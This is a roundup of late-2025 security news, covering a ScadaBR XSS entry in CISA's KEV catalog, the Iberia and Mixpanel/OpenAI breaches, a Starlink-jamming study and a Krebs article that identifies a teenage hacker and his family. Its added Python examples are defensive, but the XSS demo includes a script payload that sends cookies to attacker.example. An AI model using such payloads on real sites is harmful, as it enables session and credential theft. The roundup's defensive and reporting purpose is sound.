cybersecuritynews.com
By Guru Baran - November 29, 2025
CISA has officially updated its Known Exploited Vulnerabilities (KEV) catalog to include a critical flaw affecting OpenPLC ScadaBR, confirming that threat actors are actively weaponizing the vulnerability in the wild.
The security defect, identified as CVE-2021-26829, is a Cross-Site Scripting (XSS) vulnerability rooted in the system_settings.shtm component of ScadaBR. While the vulnerability was first disclosed several years ago, its addition to the KEV catalog on November 28, 2025, signals a concerning resurgence in exploitation activity targeting industrial control environments.
The vulnerability allows a remote attacker to inject arbitrary web script or HTML through the system settings interface. Because the injected value is stored and served back from system_settings.shtm, the script runs in the browser session of any administrator or authenticated user who later opens that page, with that user's privileges in the ScadaBR web application.
Categorized under CWE-79 (Improper Neutralization of Input During Web Page Generation), this flaw poses significant risks to Operational Technology (OT) networks.
Successful exploitation could allow attackers to hijack user sessions, steal credentials, or modify critical configuration settings within the SCADA system. Given that OpenPLC is widely used for industrial automation research and implementation, the attack surface is notable.
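To make the CWE-79 failure mode concrete, the following is an added example in Python; it is not ScadaBR's code (which is Java) and not the fix from the Scada-LTS pull request. It renders a settings page from attacker-controlled values first by raw string concatenation and then with context-appropriate HTML encoding, and uses a small parser-based check to confirm which rendering carries active content. The field names and payloads are constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed settings record standing in for values an attacker could submit
# through a settings form (hypothetical field names, not ScadaBR's own).
# Payload 1 targets the text context, payload 2 breaks out of an attribute.
ATTACKER_SETTINGS = {
    "instance_description": "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
    "email_smtp_host": 'mail.example" onmouseover="alert(1)',
}


def render_settings_vulnerable(settings: dict) -> str:
    """Concatenates stored values straight into the page: this is CWE-79."""
    rows = []
    for key, value in settings.items():
        rows.append(
            f"<tr><td>{key}</td><td>{value}</td>"
            f'<td><input name="{key}" value="{value}"></td></tr>'
        )
    return "<table>" + "".join(rows) + "</table>"


def render_settings_safe(settings: dict) -> str:
    """Encodes every stored value for HTML text and attribute contexts before output."""
    rows = []
    for key, value in settings.items():
        k = html.escape(str(key), quote=True)
        v = html.escape(str(value), quote=True)
        rows.append(
            f"<tr><td>{k}</td><td>{v}</td>"
            f'<td><input name="{k}" value="{v}"></td></tr>'
        )
    return "<table>" + "".join(rows) + "</table>"


class _ActiveContentFinder(HTMLParser):
    """Records script elements and on* event-handler attributes in parsed markup."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"event handler attribute {name}")


def active_content(rendered_html: str) -> list:
    """Returns the list of active-content findings in a rendered page (empty if none)."""
    finder = _ActiveContentFinder()
    finder.feed(rendered_html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print("vulnerable:", active_content(render_settings_vulnerable(ATTACKER_SETTINGS)))
    print("safe:      ", active_content(render_settings_safe(ATTACKER_SETTINGS)))
```

The parser check is a regression test, not a sanitizer: the real fix is output encoding at every sink (and, for a SCADA web front end, a Content-Security-Policy that forbids inline script would limit the blast radius of any sink that is missed).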
CISA indicated that this vulnerability could impact open-source components, third-party libraries, or proprietary implementations used by various products, making it challenging to fully define the scope of the threat.
Under Binding Operational Directive (BOD) 22-01, CISA has established a strict remediation timeline for Federal Civilian Executive Branch (FCEB) agencies. These agencies are required to secure their networks against CVE-2021-26829 by December 19, 2025.
While CISA has not currently linked this specific exploit to known ransomware campaigns, the agency warns that unpatched SCADA systems remain high-value targets for sophisticated threat actors.
Mitigations
Security teams and network administrators are urged to prioritize the following actions:
Apply Mitigations: Implement vendor-supplied patches or configuration changes immediately.
Review Third-Party Usage: Determine if the vulnerable ScadaBR component is embedded in other tools within the network.
Discontinue Use: If mitigations are unavailable or cannot be applied, CISA advises discontinuing the use of the product to prevent compromise.
Organizations are encouraged to review the GitHub pull request for the fix (Scada-LTS/Scada-LTS) for code-level details.
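The three actions above amount to a triage loop: match KEV entries against what is actually deployed (including ScadaBR embedded in other tools), then track the BOD 22-01 due date. The following added example in Python does both over a constructed excerpt written in the schema of CISA's KEV JSON feed; it is not CISA's tooling, the asset inventory is invented, and the `requiredAction` wording is paraphrased rather than quoted from the catalog.

```python
import json
from datetime import date

# Constructed excerpt in the field layout of the KEV JSON feed; the ScadaBR
# values follow the details reported above, the requiredAction text is paraphrased.
SAMPLE_KEV = json.loads("""{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "catalogVersion": "sample",
  "dateReleased": "2025-11-28T00:00:00.0000Z",
  "count": 1,
  "vulnerabilities": [
    {
      "cveID": "CVE-2021-26829",
      "vendorProject": "OpenPLC",
      "product": "ScadaBR",
      "vulnerabilityName": "OpenPLC ScadaBR Cross-Site Scripting Vulnerability",
      "dateAdded": "2025-11-28",
      "shortDescription": "OpenPLC ScadaBR contains a cross-site scripting vulnerability in system_settings.shtm.",
      "requiredAction": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.",
      "dueDate": "2025-12-19",
      "knownRansomwareCampaignUse": "Unknown",
      "notes": "",
      "cwes": ["CWE-79"]
    }
  ]
}""")

# Constructed asset inventory: one direct install, one product that embeds
# ScadaBR as a component, and one unrelated OpenPLC product.
SAMPLE_INVENTORY = [
    {"host": "ot-hmi-01", "product": "ScadaBR 1.12.x", "components": []},
    {"host": "ot-eng-ws-03", "product": "Custom HMI portal",
     "components": ["ScadaBR (embedded)", "Apache Tomcat"]},
    {"host": "plc-07", "product": "OpenPLC Runtime", "components": []},
]


def assets_exposed(feed: dict, inventory: list) -> list:
    """Pairs (cveID, host) for assets whose product or embedded components match a KEV product.

    Matching is on the product name only: matching on vendorProject would also
    flag "OpenPLC Runtime", which is not ScadaBR.
    """
    hits = []
    for vuln in feed["vulnerabilities"]:
        needle = vuln["product"].lower()
        for asset in inventory:
            names = [asset["product"], *asset.get("components", [])]
            if any(needle in name.lower() for name in names):
                hits.append((vuln["cveID"], asset["host"]))
    return hits


def remediation_status(feed: dict, today: date) -> list:
    """Per-CVE countdown to the BOD 22-01 due date, most urgent first."""
    rows = []
    for vuln in feed["vulnerabilities"]:
        added = date.fromisoformat(vuln["dateAdded"])
        due = date.fromisoformat(vuln["dueDate"])
        rows.append({
            "cve": vuln["cveID"],
            "days_left": (due - today).days,
            "overdue": today > due,
            "window_days": (due - added).days,
            "ransomware": vuln["knownRansomwareCampaignUse"] == "Known",
        })
    return sorted(rows, key=lambda r: r["days_left"])


if __name__ == "__main__":
    for cve, host in assets_exposed(SAMPLE_KEV, SAMPLE_INVENTORY):
        print(f"{host}: exposed to {cve}")
    for row in remediation_status(SAMPLE_KEV, date.today()):
        print(row)
```

Against the live feed, replace `SAMPLE_KEV` with the downloaded catalog; the 21-day window between `dateAdded` and `dueDate` is the standard BOD 22-01 deadline for entries that are not older CVEs with a longer window.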
securityweek.com
By Ionut Arghire | November 24, 2025 (7:14 AM ET)
Spanish flag carrier Iberia is notifying customers that their personal information was compromised after one of its suppliers was hacked.
In Spanish-language emails sent on Sunday, a copy of which threat intelligence provider Hackmanac shared on social media, the company said that names, email addresses, and frequent flyer numbers were stolen in the attack.
According to Iberia, no passwords or full credit card data was compromised in the attack, and the incident was addressed immediately after discovery.
The airline said it also improved customer account protections by requiring a verification code to be provided when attempting to change the email address associated with the account.
Iberia said it has notified law enforcement of the incident and that it has been investigating it together with its suppliers.
The company did not say when the data breach occurred and did not name the third-party supplier that was compromised. It is unclear if the incident is linked to recently disclosed hacking campaigns involving Salesforce and Oracle EBS customers.
It should also be noted that Iberia sent out notifications roughly one week after a threat actor boasted on a hacking forum about having stolen roughly 77 gigabytes of data from the airline’s systems.
The hacker claimed to have stolen ISO 27001 and ITAR-classified information, technical aircraft documentation, engine data, and various other internal documents.
Asking $150,000 for the data, the threat actor was marketing it as suitable for corporate espionage, extortion, or resale to governments.
Founded in 1927, Iberia merged with British Airways in 2011, forming International Airlines Group (IAG), which also owns Aer Lingus, BMI, and Vueling. Iberia currently has an all-Airbus fleet, operating on routes to 130 destinations worldwide.
interestingengineering.com
By Bojan Stojkovski
Nov 23, 2025 02:26 PM EST
A new simulation by Chinese defense researchers suggests that jamming Starlink coverage over an area the size of Taiwan is technically possible.
Instead of focusing on whether Starlink can be jammed in theory, Chinese military planners are increasingly concerned with how such a feat could be attempted in a real conflict over Taiwan. The challenge is staggering: Taiwan and its allies could rely on a constellation of more than 10,000 satellites that hop frequencies, reroute traffic and resist interference in real time.
However, a recent simulation study by Chinese researchers delivers the most detailed public attempt yet to model a potential countermeasure.
Published on November 5 in the peer-reviewed journal Systems Engineering and Electronics, the paper concludes that disrupting Starlink across an area comparable to Taiwan is technically achievable – but only with a massive electronic warfare (EW) force.
Dynamic Starlink network poses major hurdle for EW
Rather than treating Starlink as a static system, Chinese researchers emphasize that its constantly shifting geometry is the real obstacle. In their peer-reviewed study, the team from Zhejiang University and the Beijing Institute of Technology notes that the constellation’s orbital planes are continuously changing, with satellites moving in and out of view at all times.
This dynamic behavior creates extreme uncertainty for any military attempting to monitor, track or interfere with Starlink’s downlink signals, the South China Morning Post reports. Unlike older satellite networks that depend on a few big geostationary satellites parked over the equator, Starlink behaves nothing like a fixed target.
Traditional systems can be jammed by simply overpowering the signal from the ground, but Starlink changes the equation. Its satellites are low-orbit, fast-moving and deployed by the thousands. A single user terminal never stays linked to just one satellite – it rapidly switches between several, forming a constantly shifting mesh in the sky. As the researchers explain, even if one link is successfully jammed, the connection simply jumps to another within seconds, making interference far harder to sustain.
Distributed jamming swarms seen as the sole viable method
Yang’s research team explains that the only realistic countermeasure would be a fully distributed jamming strategy. Instead of using a few powerful ground stations, an attacker would need hundreds – or even thousands – of small, synchronized jammers deployed in the air on drones, balloons or aircraft. Together, these platforms would form a wide electromagnetic barrier over the combat zone.
The simulation tested realistic jamming by having each airborne jammer broadcast noise at different power levels. Researchers compared wide‑beam antennas that cover more area with less energy to narrow‑beam antennas that are stronger but require precise aiming. For every point on the ground, the model calculated whether a Starlink terminal could still maintain a usable signal.
The Chinese researchers calculated that fully suppressing Starlink over Taiwan, roughly 13,900 square miles, would require at least 935 synchronized jamming platforms, not including backups for failures, terrain interference, or future Starlink upgrades. Using cheaper 23 dBW power sources with spacing of about 3 miles would push the requirement to around 2,000 airborne units, though the team stressed the results remain preliminary since key Starlink anti‑jamming details are still confidential.
privatim
privatim.ch
Monday, 24 November 2025
Cloud-based software has never been more attractive. Infrastructures potentially accessible to every Internet user ("public clouds") allow computing and storage capacity to be allocated dynamically according to customer needs. This economy of scale grows with the size of the cloud provider's infrastructure, which is usually international (for example the "hyperscalers" Microsoft, Google or Amazon).
Besides individuals and private companies, more and more public bodies are using Software-as-a-Service (SaaS) applications from these providers. Providers, for their part, are increasingly pushing their customers toward the cloud.
Public bodies, however, carry a particular responsibility for their citizens' data. They may outsource the processing of that data, but they must ensure that data protection and information security are upheld. Before outsourcing personal data to cloud computing services, authorities must therefore analyse the specific risks in each case, regardless of the sensitivity of the data, and reduce them to an acceptable level through appropriate measures (see privatim's cloud fact sheet).
For the following reasons, privatim considers that the outsourcing by public bodies of sensitive personal data, or of data subject to a statutory duty of secrecy, to the SaaS solutions of large international providers (notably M365) is not admissible in most cases:
Most SaaS solutions do not yet offer true end-to-end encryption, which would prevent the provider from accessing the data in clear text.
Globally operating companies offer too little transparency for Swiss authorities to verify compliance with contractual obligations on data protection and security. This applies to the implementation of technical measures and to change and release management, as well as to the engagement and supervision of staff and subcontractors, who sometimes form long chains of external service providers. In addition, software providers can periodically and unilaterally amend the contractual terms.
The use of SaaS applications therefore entails a considerable loss of control. The public body cannot influence the probability of an infringement of fundamental rights. It can only reduce the severity of potential violations by not disclosing sensitive data outside its sphere of control.
As regards data subject to a statutory duty of secrecy, there is at times considerable legal uncertainty about the extent to which they may be transferred to cloud computing services. Not every third party can be engaged as an auxiliary merely because the criminal-law provisions on professional and official secrecy also bind the secret holder's auxiliaries to silence.
Under the CLOUD Act adopted in 2018, US providers can be compelled to hand over their customers' data to US authorities without following the rules of international mutual legal assistance, even if the data are stored in Swiss data centres.
Conclusion: the use of international SaaS solutions by public bodies for sensitive personal data or data subject to a statutory duty of secrecy is possible only if the data are encrypted by the responsible body itself and the cloud provider has no access to the key.
mixpanel.com
sms-security-incident
Out of transparency and our desire to share with our community, this blog post contains key information about a recent security incident that impacted a limited number of our customers. On November 8th, 2025, Mixpanel detected a smishing campaign and promptly executed our incident response processes. We took comprehensive steps to contain and eradicate unauthorized access and secure impacted user accounts. We engaged external cybersecurity partners to remediate and respond to the incident.
We proactively communicated with all impacted customers. If you have not heard from us directly, you were not impacted. We continue to prioritize security as a core tenet of our company, products and services. We are committed to supporting our customers and communicating transparently about this incident.
What we did in response
OpenAI
openai.com/index/mixpanel-incident
November 26, 2025
OpenAI shares details about a Mixpanel security incident involving limited API analytics data. No API content, credentials, or payment details were exposed. Learn what happened and how we’re protecting users.
Transparency is important to us, so we want to inform you about a recent security incident at Mixpanel, a data analytics provider OpenAI used for web analytics on the frontend interface for our API product (platform.openai.com).
The incident occurred within Mixpanel’s systems and involved limited analytics data related to some users of the API. Users of ChatGPT and other products were not impacted.
This was not a breach of OpenAI’s systems. No chat, API requests, API usage data, passwords, credentials, API keys, payment details, or government IDs were compromised or exposed.
What happened
On November 9, 2025, Mixpanel became aware of an attacker that gained unauthorized access to part of their systems and exported a dataset containing limited customer identifiable information and analytics information. Mixpanel notified OpenAI that they were investigating, and on November 25, 2025, they shared the affected dataset with us.
What this means for impacted users
User profile information associated with the use of platform.openai.com may have been included in data exported from Mixpanel. The information that may have been affected was limited to:
Name that was provided to us on the API account
Email address associated with the API account
Approximate coarse location based on API user browser (city, state, country)
Operating system and browser used to access the API account
Referring websites
Organization or User IDs associated with the API account
Our response
As part of our security investigation, we removed Mixpanel from our production services, reviewed the affected datasets, and are working closely with Mixpanel and other partners to fully understand the incident and its scope. We are in the process of notifying impacted organizations, admins, and users directly. While we have found no evidence of any effect on systems or data outside Mixpanel’s environment, we continue to monitor closely for any signs of misuse.
Trust, security, and privacy are foundational to our products, our organization, and our mission. We are committed to transparency, and are notifying all impacted customers and users. We also hold our partners and vendors accountable for the highest bar for security and privacy of their services. After reviewing this incident, OpenAI has terminated its use of Mixpanel.
Beyond Mixpanel, we are conducting additional and expanded security reviews across our vendor ecosystem and are elevating security requirements for all partners and vendors.
What you should keep in mind
The information that may have been affected here could be used as part of phishing or social engineering attacks against you or your organization.
Since names, email addresses, and OpenAI API metadata (e.g., user IDs) were included, we encourage you to remain vigilant for credible-looking phishing attempts or spam. As a reminder:
Treat unexpected emails or messages with caution, especially if they include links or attachments.
Double-check that any message claiming to be from OpenAI is sent from an official OpenAI domain.
OpenAI does not request passwords, API keys, or verification codes through email, text, or chat.
Further protect your account by enabling multi-factor authentication.
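The second and third reminders above (check the sending domain; OpenAI never asks for secrets by email) can be turned into a mechanical screen for a mail gateway or a user's own inbox rules. The following is an added example in Python, not OpenAI's or Mixpanel's code: it parses a raw message, checks the From domain against an allow-list (the list itself is an assumption, OpenAI's official sending domains are not given on this page), requires a DKIM pass signed by an official domain when the From claims one, flags lookalike domains and mismatched Reply-To, and looks for requests for credentials in the body. The three messages are constructed for the demonstration.

```python
import re
from email import message_from_string
from email.policy import default
from email.utils import parseaddr

# Assumption: domains treated as official. Adjust to the sender domains you
# have actually observed from OpenAI; nothing on this page lists them.
OFFICIAL_DOMAINS = ("openai.com",)
# Things the notice says OpenAI never requests by email, text, or chat.
SECRET_REQUESTS = ("api key", "password", "verification code")


def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def is_official(domain: str) -> bool:
    return any(domain == d or domain.endswith("." + d) for d in OFFICIAL_DOMAINS)


def assess_message(raw: str) -> dict:
    """Screens one RFC 5322 message and returns the reasons it looks like phishing."""
    msg = message_from_string(raw, policy=default)
    display, from_addr = parseaddr(str(msg.get("From", "")))
    from_domain = domain_of(from_addr)
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    # Authentication-Results is written by the receiving MTA; we only trust
    # a dkim=pass whose signing domain (header.d) is itself official.
    auth = str(msg.get("Authentication-Results", "")).lower()
    dkim = re.search(r"dkim=pass[^;]*header\.d=([\w.-]+)", auth)
    dkim_domain = dkim.group(1) if dkim else ""
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content().lower() if body else ""

    reasons = []
    if not is_official(from_domain):
        reasons.append(f"sender domain {from_domain!r} is not an official domain")
        if "openai" in from_domain or "openai" in display.lower():
            reasons.append("lookalike: name or domain invokes OpenAI without being official")
    elif not is_official(dkim_domain):
        reasons.append("official sender domain but no DKIM pass signed by that domain")
    if reply_addr and domain_of(reply_addr) != from_domain:
        reasons.append(f"Reply-To goes to a different domain: {domain_of(reply_addr)}")
    asked = [k for k in SECRET_REQUESTS if k in text]
    if asked:
        reasons.append("asks for " + ", ".join(asked) + ", which is never requested by email")
    return {"from_domain": from_domain, "dkim_domain": dkim_domain,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample messages (headers abbreviated to what the check reads).
LEGIT_MESSAGE = """\
From: OpenAI <noreply@openai.com>
To: dev@customer.example
Subject: Your API usage report
Authentication-Results: mx.customer.example; dkim=pass header.d=openai.com; spf=pass smtp.mailfrom=openai.com

Your monthly usage summary is available on your dashboard at platform.openai.com.
"""

LOOKALIKE_MESSAGE = """\
From: OpenAI Security <security@openai-support.com>
Reply-To: verify@openai-support.com
To: dev@customer.example
Subject: Action required: confirm your API key after the Mixpanel incident
Authentication-Results: mx.customer.example; dkim=pass header.d=openai-support.com; spf=pass smtp.mailfrom=openai-support.com

Due to the recent incident, reply with your API key and the verification code we sent you.
"""

SPOOFED_MESSAGE = """\
From: OpenAI <noreply@openai.com>
To: dev@customer.example
Subject: Reset your password
Authentication-Results: mx.customer.example; dkim=none; spf=fail smtp.mailfrom=openai.com

Click the link and enter your password to keep access to your account.
"""

if __name__ == "__main__":
    for name, raw in (("legit", LEGIT_MESSAGE), ("lookalike", LOOKALIKE_MESSAGE), ("spoofed", SPOOFED_MESSAGE)):
        print(name, assess_message(raw))
```

Note the lookalike case: its DKIM signature is valid, just for the wrong domain. A gateway that stops at "dkim=pass" would wave it through, which is why the check anchors on the From domain first and treats DKIM as corroboration only.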
The security and privacy of our products are paramount, and we remain resolute in protecting your information and communicating transparently when issues arise. Thank you for your continued trust in us.
OpenAI
FAQ
Why did OpenAI use Mixpanel?
Mixpanel was used as a third-party web analytics provider to help us understand product usage and improve our services for our API product (platform.openai.com)
Was this caused by a vulnerability in OpenAI’s systems?
No. This incident was limited to Mixpanel’s systems and did not involve unauthorized access to OpenAI’s infrastructure.
How do I know if my organization or I were impacted?
We are in the process of notifying those impacted now, and we will reach out to you, or your organization admin, directly via email to inform you.
Was any of my API data, prompts, or outputs affected?
No. Chat content, prompts, responses, or API usage data were not impacted.
Were ChatGPT accounts affected by this?
No. Users of ChatGPT and other products were not impacted.
Were OpenAI passwords, API keys, or payment information exposed?
No. OpenAI passwords, API keys, payment information, government IDs, and account access credentials were not impacted. Additionally, we have confirmed that session tokens, authentication tokens, and other sensitive parameters for OpenAI services were not impacted.
Do I need to reset my password or rotate my API keys?
Because passwords and API keys were not affected, we are not recommending resets or key rotation in response to this incident.
What are you doing to protect my personal information and privacy?
We have obtained the impacted datasets for independent review and are continuing to investigate potential impact, and monitor closely for any signs of misuse. We are notifying all individually impacted users and organizations and are in contact with Mixpanel on further response actions.
Has Mixpanel been removed from OpenAI products?
Yes.
Should I enable multi-factor authentication for my account?
Yes. While account credentials or tokens were not impacted in this incident, as a best practice security control, we recommend all users enable multi-factor authentication to further protect their accounts. For enterprises and organizations, we recommend that MFA is enabled at the single sign-on layer.
Will I receive further updates if something changes?
We’re committed to transparency and will keep you informed if we identify new information that materially affects impacted users. We will also update this FAQ.
Is there someone I can reach out to if I have questions?
If you have questions, concerns, or security issues, you can reach our support team at mixpanelincident@openai.com.
Krebs on Security
krebsonsecurity.com
November 26, 2025
A prolific cybercriminal group that calls itself “Scattered LAPSUS$ Hunters” has dominated headlines this year by regularly stealing data from and publicly mass extorting dozens of major corporations. But the tables seem to have turned somewhat for “Rey,” the moniker chosen by the technical operator and public face of the hacker group: Earlier this week, Rey confirmed his real life identity and agreed to an interview after KrebsOnSecurity tracked him down and contacted his father.
Scattered LAPSUS$ Hunters (SLSH) is thought to be an amalgamation of three hacking groups — Scattered Spider, LAPSUS$ and ShinyHunters. Members of these gangs hail from many of the same chat channels on the Com, a mostly English-language cybercriminal community that operates across an ocean of Telegram and Discord servers.
In May 2025, SLSH members launched a social engineering campaign that used voice phishing to trick targets into connecting a malicious app to their organization’s Salesforce portal. The group later launched a data leak portal that threatened to publish the internal data of three dozen companies that allegedly had Salesforce data stolen, including Toyota, FedEx, Disney/Hulu, and UPS.
Last week, the SLSH Telegram channel featured an offer to recruit and reward “insiders,” employees at large companies who agree to share internal access to their employer’s network for a share of whatever ransom payment is ultimately paid by the victim company.
SLSH has solicited insider access previously, but their latest call for disgruntled employees started making the rounds on social media at the same time news broke that the cybersecurity firm CrowdStrike had fired an employee for allegedly sharing screenshots of internal systems with the hacker group (CrowdStrike said its systems were never compromised and that it has turned the matter over to law enforcement agencies).
Members of SLSH have traditionally used other ransomware gangs’ encryptors in attacks, including malware from ransomware affiliate programs like ALPHV/BlackCat, Qilin, RansomHub, and DragonForce. But last week, SLSH announced on its Telegram channel the release of their own ransomware-as-a-service operation called ShinySp1d3r.
The individual responsible for releasing the ShinySp1d3r ransomware offering is a core SLSH member who goes by the handle “Rey” and who is currently one of just three administrators of the SLSH Telegram channel. Previously, Rey was an administrator of the data leak website for Hellcat, a ransomware group that surfaced in late 2024 and was involved in attacks on companies including Schneider Electric, Telefonica, and Orange Romania.
Also in 2024, Rey would take over as administrator of the most recent incarnation of BreachForums, an English-language cybercrime forum whose domain names have been seized on multiple occasions by the FBI and/or by international authorities. In April 2025, Rey posted on Twitter/X about another FBI seizure of BreachForums.
On October 5, 2025, the FBI announced it had once again seized the domains associated with BreachForums, which it described as a major criminal marketplace used by ShinyHunters and others to traffic in stolen data and facilitate extortion.
“This takedown removes access to a key hub used by these actors to monetize intrusions, recruit collaborators, and target victims across multiple sectors,” the FBI said.
Incredibly, Rey would make a series of critical operational security mistakes last year that provided multiple avenues to ascertain and confirm his real-life identity and location. Read on to learn how it all unraveled for Rey.
WHO IS REY?
According to the cyber intelligence firm Intel 471, Rey was an active user on various BreachForums reincarnations over the past two years, authoring more than 200 posts between February 2024 and July 2025. Intel 471 says Rey previously used the handle “Hikki-Chan” on BreachForums, where their first post shared data allegedly stolen from the U.S. Centers for Disease Control and Prevention (CDC).
In that February 2024 post about the CDC, Hikki-Chan says they could be reached at the Telegram username @wristmug. In May 2024, @wristmug posted in a Telegram group chat called “Pantifan” a copy of an extortion email they said they received that included their email address and password.
The message that @wristmug cut and pasted appears to have been part of an automated email scam that claims it was sent by a hacker who has compromised your computer and used your webcam to record a video of you while you were watching porn. These missives threaten to release the video to all your contacts unless you pay a Bitcoin ransom, and they typically reference a real password the recipient has used previously.
“Noooooo,” the @wristmug account wrote in mock horror after posting a screenshot of the scam message. “I must be done guys.”
In posting their screenshot, @wristmug redacted the username portion of the email address referenced in the body of the scam message. However, they did not redact their previously-used password, and they left the domain portion of their email address (@proton.me) visible in the screenshot.
O5TDEV
Searching on @wristmug’s rather unique 15-character password in the breach tracking service Spycloud finds it is known to have been used by just one email address: cybero5tdev@proton.me. According to Spycloud, those credentials were exposed at least twice in early 2024 when this user’s device was infected with an infostealer trojan that siphoned all of its stored usernames, passwords and authentication cookies.
Intel 471 shows the email address cybero5tdev@proton.me belonged to a BreachForums member who went by the username o5tdev. Searching on this nickname in Google brings up at least two website defacement archives showing that a user named o5tdev was previously involved in defacing sites with pro-Palestinian messages. One such archive screenshot (not reproduced here) shows that 05tdev was part of a group called Cyb3r Drag0nz Team.
A 2023 report from SentinelOne described Cyb3r Drag0nz Team as a hacktivist group with a history of launching DDoS attacks and cyber defacements as well as engaging in data leak activity.
“Cyb3r Drag0nz Team claims to have leaked data on over a million of Israeli citizens spread across multiple leaks,” SentinelOne reported. “To date, the group has released multiple .RAR archives of purported personal information on citizens across Israel.”
The cyber intelligence firm Flashpoint finds the Telegram user @05tdev was active in 2023 and early 2024, posting in Arabic on anti-Israel channels like “Ghost of Palestine” [full disclosure: Flashpoint is currently an advertiser on this blog].
‘I’M A GINTY’
Flashpoint shows that Rey's Telegram account (ID 7047194296) was particularly active in a cybercrime-focused channel called Jacuzzi, where this user shared several personal details, including that their father was an airline pilot. Rey claimed in 2024 to be 15 years old, and to have family connections to Ireland.
Specifically, Rey mentioned in several Telegram chats that he had Irish heritage, even posting a graphic that shows the prevalence of the surname “Ginty.”
Spycloud indexed hundreds of credentials stolen from cybero5tdev@proton.me, and those details indicate that Rey's computer is a shared Microsoft Windows device located in Amman, Jordan. The credential data stolen from Rey in early 2024 show there are multiple users of the infected PC, but that all shared the same last name of Khader and an address in Amman, Jordan.
The “autofill” data lifted from Rey’s family PC contains an entry for a 46-year-old Zaid Khader that says his mother’s maiden name was Ginty. The infostealer data also shows Zaid Khader frequently accessed internal websites for employees of Royal Jordanian Airlines.
MEET SAIF
The infostealer data makes clear that Rey’s full name is Saif Al-Din Khader. Having no luck contacting Saif directly, KrebsOnSecurity sent an email to his father Zaid. The message invited the father to respond via email, phone or Signal, explaining that his son appeared to be deeply enmeshed in a serious cybercrime conspiracy.
Less than two hours later, I received a Signal message from Saif, who said his dad suspected the email was a scam and had forwarded it to him.
“I saw your email, unfortunately I don’t think my dad would respond to this because they think its some ‘scam email,'” said Saif, who told me he turns 16 years old next month. “So I decided to talk to you directly.”
Saif explained that he’d already heard from European law enforcement officials, and had been trying to extricate himself from SLSH. When asked why then he was involved in releasing SLSH’s new ShinySp1d3r ransomware-as-a-service offering, Saif said he couldn’t just suddenly quit the group.
“Well I cant just dip like that, I’m trying to clean up everything I’m associated with and move on,” he said.
He also shared that ShinySp1d3r is just a rehash of Hellcat ransomware, except modified with AI tools. “I gave the source code of Hellcat ransomware out basically.”
Saif claims he reached out on his own recently to the Telegram account for Operation Endgame, the codename for an ongoing law enforcement operation targeting cybercrime services, vendors and their customers.
“I’m already cooperating with law enforcement,” Saif said. “In fact, I have been talking to them since at least June. I have told them nearly everything. I haven’t really done anything like breaching into a corp or extortion related since September.”
Saif suggested that a story about him right now could endanger any further cooperation he may be able to provide. He also said he wasn’t sure if the U.S. or European authorities had been in contact with the Jordanian government about his involvement with the hacking group.
“A story would bring so much unwanted heat and would make things very difficult if I’m going to cooperate,” Saif said. “I’m unsure whats going to happen they said they’re in contact with multiple countries regarding my request but its been like an entire week and I got no updates from them.”
Saif shared a screenshot that indicated he’d contacted Europol authorities late last month. But he couldn’t name any law enforcement officials he said were responding to his inquiries, and KrebsOnSecurity was unable to verify his claims.
“I don’t really care I just want to move on from all this stuff even if its going to be prison time or whatever they gonna say,” Saif said.
politico.eu
November 24, 2025 9:12 pm CET
By Mathieu Pollet
“We cannot afford this level of dependence on foreign tech,” lawmakers say in letter obtained by POLITICO.
BRUSSELS — A cross-party group of lawmakers will urge the European Parliament to ditch internal use of Microsoft’s ubiquitous software in favor of a European alternative, according to a letter obtained by POLITICO.
The call comes amid fresh concerns that the dominance of a handful of U.S. tech giants has become too much of a liability for Europe’s security and prosperity, and as the U.S. administration renewed demands for digital concessions at a meeting in Brussels on Monday.
In the scathing letter to be delivered to Parliament President Roberta Metsola on Tuesday, 38 lawmakers also list the screens, keyboards and mice from Dell, HP and LG, in use across the chamber's IT systems, as technology that should be ditched.
“With its thousands of employees and vast resources, the European Parliament is best positioned to galvanise the push for tech sovereignty,” the letter reads. “When even old friends can turn into foes and their companies into a political tool, we cannot afford this level of dependence on foreign tech, let alone continue funneling billions of taxpayers' money abroad.”
The lawmakers cite a broad range of European alternatives they argue are viable solutions: from Norwegian internet browser Vivaldi, French search engine Qwant and Swiss secure email suite Proton to German collaboration platform Nextcloud.
“Our mid-term goal should be the complete phase-out of Microsoft products, including the Windows operating system. It’s easier than it sounds,” the lawmakers say, praising the International Criminal Court’s recent move to drop Microsoft over U.S. sanction fears.
The letter is signed by influential members including MEPs Aura Salla and Mika Aaltola from the center-right EPP; Birgit Sippel and Raphaël Glucksmann from the center-left S&D; Stéphanie Yon-Courtin and Marie-Agnes Strack-Zimmermann from the centrist Renew Europe group; Alexandra Geese and Kim van Sparrentak from the Greens; and Leïla Chaibi and Merja Kyllönen from The Left.
“The Parliament's vehicle fleet is almost entirely made up of cars from European brands. The same can be replicated for end-product computer hardware,” they argue. They call to set up a task group of lawmakers and Parliament staffers to help and monitor that transition.
“With enough political will, we will have freed this institution from the danger of foreign tech dependency by the end of the mandate,” they write.
Last week saw Germany swing behind a long-standing push from France to make Europe more reliant on its own technology companies and chart its digital independence from the U.S., at a political summit in Berlin.
Austrian centrist lawmaker Helmut Brandstätter, who coordinated the initiative, said in a statement: “Right now, the European Parliament runs on foreign software that can be switched off, monitored, or politically weaponised overnight. That is not just inconvenient, it is a strategic vulnerability,” adding this isn't “anti-American” but “pro European sovereignty.”
“Microsoft is proud to offer the broadest set of sovereignty solutions on the market today,” Robin Koch, a spokesperson for the company, said in a statement. “We will continue to look for new ways to ensure the European Parliament and our other European customers have the options and assurances they need to operate with confidence.”
cisa.gov Alert
Release Date: November 24, 2025
CISA is aware of multiple cyber threat actors actively leveraging commercial spyware to target users of mobile messaging applications (apps). These cyber actors use sophisticated targeting and social engineering techniques to deliver spyware and gain unauthorized access to a victim’s messaging app, facilitating the deployment of additional malicious payloads that can further compromise the victim’s mobile device.
These cyber actors use tactics such as:
